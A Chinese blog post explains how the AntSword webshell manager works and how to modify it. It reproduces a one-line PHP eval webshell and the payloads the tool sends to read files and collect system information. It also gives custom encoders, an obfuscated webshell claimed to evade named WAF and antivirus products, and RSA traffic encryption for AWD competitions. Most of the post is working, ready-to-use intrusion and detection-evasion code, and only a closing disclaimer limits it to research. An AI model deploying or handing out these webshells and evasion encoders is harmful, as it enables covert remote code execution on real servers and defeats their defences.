蟻劍原理與魔改

Lmg66發表於2020-11-21

一句話木馬原理

一句話木馬形如這樣:

<?php @eval($_POST[password]);?>

使用蟻劍連線,連線成功

那為什麼能成功呢?
首先要探尋一句話木馬的原理

所以我們post傳入的字串會以php程式碼的形式執行,而php程式碼又能呼叫系統操作所以便成了木馬

蟻劍的原理

知道了一句話木馬的原理,那麼我們康康蟻劍的原理,蟻劍用很多功能確實很方便。還支援編碼,垃圾數值,隨機數,自定義編碼解碼器。

首先選擇代理設定,因為這裡我們選擇用burpsuite來抓取流量,

蟻劍連線來分析一下流量

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
	return $out;
};
function asoutput(){
$output=ob_get_contents(); //返回輸出緩衝區的內容
ob_end_clean(); //清理(擦除)緩衝區並關閉輸出緩衝
echo "c6b05fd97";
echo @asenc($output);echo "d69e35d304";}
ob_start(); //開啟輸出緩衝區
try{
$D=dirname($_SERVER["SCRIPT_FILENAME"]); //獲取當前url路由的絕對路徑
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]); //當前指令碼所在檔案系統(非文件根目錄)的基本路徑
$R="{$D}	";
if(substr($D,0,1)!="/"){
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
}
else{
$R.="/";}$R.="	";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die(); //獲取目錄,uid,系統資訊,使用者等資訊

然後我們就大概瞭解了一下蟻劍的功能,在康康蟻劍是如何獲取資料的

@ini_set("display_errors", "0");
@set_time_limit(0);            //不顯示報錯
function asenc($out){
return $out;
};		                       //用於返回資訊
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "a170af01bc";			//用於返回資訊,同時加入歲間字首,對安全狗是一種繞過
echo @asenc($output);
echo "6d341a3c3a";
}
ob_start();					
try{
$F=base64_decode(substr($_POST["hfdce8c1b4e4ef"],2));      //base64解碼post傳入的另一個資料
$P=@fopen($F,"r");										// 進行讀取檔案的操作
echo(@fread($P,filesize($F)?filesize($F):4096));
@fclose($P);;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();   //報錯資訊

原理還是很好理解的,但是不明白為什麼要令外post一個資料再進去檔案內的傳遞,難道是面對物件編寫的原因,還是令有好處,但是如果整體個人覺得更容易混淆流量,不過問題不大,後面還要編碼更多的引數,才能繞過安全?

編碼器原理

蟻劍自帶變數,支援我們自定義編碼和加密方式來混淆傳入的主變數(不知道叫啥名字就就是連線密碼的那個變數)的引數

/**
 * php::base64編碼器
 * Create at: 2020/11/21 15:21:10
 */

'use strict';

/*
* @param  {String} pwd   連線密碼
* @param  {Array}  data  編碼器處理前的 payload 陣列
* @return {Array}  data  編碼器處理後的 payload 陣列
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    請在下方編寫你自己的程式碼   ###################
  // 以下程式碼為 PHP Base64 樣例

  // 生成一個隨機變數名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出來之後,轉為 base64 編碼並放入 randomID key 下
  data[randomID] = Buffer.from(data['_']).toString('base64');

  // shell 在接收到 payload 後,先處理 pwd 引數下的內容,
  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;

  // ##########    請在上方編寫你自己的程式碼   ###################

  // 刪除 _ 原有的payload
  delete data['_'];
  // 返回編碼器處理後的 payload 陣列
  return data;
}

程式碼作者已經給了註釋很好理解,然後我們就可以開心的構造自己的編碼方式來繞過安全狗了。

免殺小例子

這裡給了例子吧。直接使用雙層base64,我丟盡然還能免殺(後來測試發現),學長聊天說雙base64能過?,我起初不信,嘗試了一下,發現不行。寫這篇文章的時候嘗試一下還是不行,然後發現是因為我的webshell沒有做免殺處理,被?直接給掃出來,然後就不管你的流量了直接殺,wogiao!牛皮!!
雙base64蟻劍編碼器

/**
 * php::base64編碼器
 * Create at: 2020/11/21 15:21:10
 */

'use strict';

/*
* @param  {String} pwd   連線密碼
* @param  {Array}  data  編碼器處理前的 payload 陣列
* @return {Array}  data  編碼器處理後的 payload 陣列
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    請在下方編寫你自己的程式碼   ###################
  // 以下程式碼為 PHP Base64 樣例

  // 生成一個隨機變數名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出來之後,轉為 base64 編碼並放入 randomID key 下
  data['_'] = Buffer.from(data['_']).toString('base64');

  // shell 在接收到 payload 後,先處理 pwd 引數下的內容,
  //data[pwd] = `${data['_']}"));`;
  data[pwd] = Buffer.from(data['_']).toString('base64');

  // ##########    請在上方編寫你自己的程式碼   ###################

  // 刪除 _ 原有的payload
  delete data['_'];
  // 返回編碼器處理後的 payload 陣列
  return data;
}

免殺的webshell

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['password'];
$post = &$password;
$post=base64_decode(base64_decode($post));
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>

webshell是能夠免殺安全?和D盾和護衛神的,其他的沒測試

解碼器原理

/**
 * php::base64解碼器
 * Create at: 2020/11/21 17:15:24
 */

'use strict';

module.exports = {
  /**
   * @returns {string} asenc 將返回資料base64編碼
   * 自定義輸出函式名稱必須為 asenc
   * 該函式使用的語法需要和shell保持一致
   */
  asoutput: () => {
    return `function asenc($out){
      return @base64_encode($out);
    }
    `.replace(/\n\s+/g, '');
  },
  /**
   * 解碼 Buffer
   * @param {string} data 要被解碼的 Buffer
   * @returns {string} 解碼後的 Buffer
   */
  decode_buff: (data, ext={}) => {
    return Buffer.from(data.toString(), 'base64');
  }
}

官方註釋很清楚這裡就不弄了,而且我覺得蟻劍自帶的base64啥的解碼器完全夠用,流量的混淆根本沒法猜,有隨機的字首字尾是你所傳參的時候傳過去的,所有我沒整就過?了。

蟻劍RSA

RSA一種基於密碼學的非對稱加密來混淆流量的方法,先用私鑰對要加密的東西進行加密,然後用公鑰解密,所以我們把公鑰放入webshell裡面,就可實現對流量的混淆
RSA的原理利用的是數論中的mod運算,不可破解的原因就是一個大數不易分解為兩個素數的乘積,所以便可實現加解密。

同樣的RSA混淆流量對CTF的AWD模式也有好處,就是別人沒法通過檢視自己的webshell,來連線其他的人webshell,因為你如果能打下來不可能只種一個webshell
參考:先知社群_從0到1掌握AWD攻防之RSA必殺

蟻劍的RSA使用方式很簡單
使用前提,目標要php開啟ssl,這個也是這個加密方法的缺陷,不開啟沒法呼叫解密函式

開啟openssl方法
開啟iphp.ini
搜尋extension=php_openssl.dll,把前面的分號取消,然後重啟web服務
在編碼器的位置

然後建立一個

然後將這個位置的webshell上傳,寫入啥的弄到目標

然後連線的時候選擇你建立的編碼器就好了,測試了一下,安全?和護衛神不攔截,D盾可以掃描出來但是危險等級不高。
對於AWDctf利用蟻劍作者針對RSA也加了一個方法
在RSA編碼器的位置加入下面程式碼,什麼作用呢,在awd中別人抓取你的webshell讀取flag流量進行轉發到其他伺服器中也可以獲得flag,所以這裡設定時效為5秒,可以設定更短。

data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;

參考文章及說明

蟻劍改造過WAF系列

蟻劍改造計劃

學蟻致用
最後歡迎訪問我的個人部落格:https://lnng.top/
說明:本文僅限技術研究與討論,嚴禁用於非法用途,否則產生的一切後果自行承擔

相關文章